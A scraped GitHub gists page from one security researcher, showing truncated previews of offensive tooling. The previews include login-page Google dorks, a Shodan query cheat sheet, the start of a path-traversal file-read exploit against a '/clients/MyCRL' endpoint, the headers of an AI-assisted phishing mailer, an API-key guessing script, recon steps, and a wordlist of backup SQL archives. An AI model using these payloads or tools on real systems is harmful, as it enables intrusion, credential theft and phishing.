Skip to content

Instantly share code, notes, and snippets.

View JoyGhoshs's full-sized avatar
🇧🇩
Bangladeshi

Abdur Rahman Maheer JoyGhoshs

🇧🇩
Bangladeshi
View GitHub Profile
@JoyGhoshs
JoyGhoshs / colab-rdp.ipynb
Created December 27, 2021 11:26
colab-rdp.ipynb
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
site:*/sign-in
site:*/account/login
site:*/forum/ucp.php?mode=login
inurl:memberlist.php?mode=viewprofile
intitle:"EdgeOS" intext:"Please login"
inurl:user_login.php
intitle:"Web Management Login"
site:*/users/login_form
site:*/access/unauthenticated
site:account.*.*/login
hostname:target.com | to find all asset available for target.com on shodan
http.title:"title" | to find server/host with similer title
http.html:"/file" | to find server/host with similar path
html:"context" | to find server/host with similar string
server: "apache 2.2.3" | to find server/host with same server
port:80 | to find server/host with same port
os:"windows" | to find server/host with same os
asn:AS3214 | to find host/server with matched asn
http.status:200 | to find server/host with 200 http response code
http.favicon.hash:"hash" | to find server/host with same favico hash
import requests
from argparse import ArgumentParser
from urllib3.exceptions import InsecureRequestWarning
from colorama import Fore, Style
from concurrent.futures import ThreadPoolExecutor
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def exploit(ip, path):
host = f'https://{ip}/clients/MyCRL'
data = f'aCSHELL/../../../../../../../../../../..{path}'
@JoyGhoshs
JoyGhoshs / AI_PHISER.py
Last active May 1, 2024 09:41
This article is solely for educational purposes. It's simply an experiment of mine. I am not responsible for any misuse of the information or code contained here. If someone uses this method or code for malicious purposes, they are solely responsible for their actions.
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
import email.utils
import google.generativeai as genai
import argparse
import random
import requests
import requests
import random
import json
import time
def key_generator():
key = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.choice(key) for i in range(32))
def key_vaildator(key):
try:
import requests
import os
import subprocess
import re
Instructions = [
"Check system configuration",
"Check Current logged in user",
"Check if the system is running on a virtual machine",
import asyncio
import multiprocessing
import threading
import time
import requests
import aiohttp
import psutil
from termcolor import colored
from tabulate import tabulate
@JoyGhoshs
JoyGhoshs / criminal_ip.py
Created July 16, 2022 04:20
Automation of account creation and verification process
import requests
import json
import random
import re
from colorama import init, Fore, Back, Style
from time import sleep
import argparse
#signature
info = f"[{Fore.BLUE}INFO{Fore.RESET}]"
warn = f"[{Fore.YELLOW}WARN{Fore.RESET}]"
0.1.0.sql
0.1.1.sql
0.1.2.sql
0.tar.gz
0.zip
1.sql
1.sql.7z
1.sql.bz2
1.sql.gz
1.sql.rar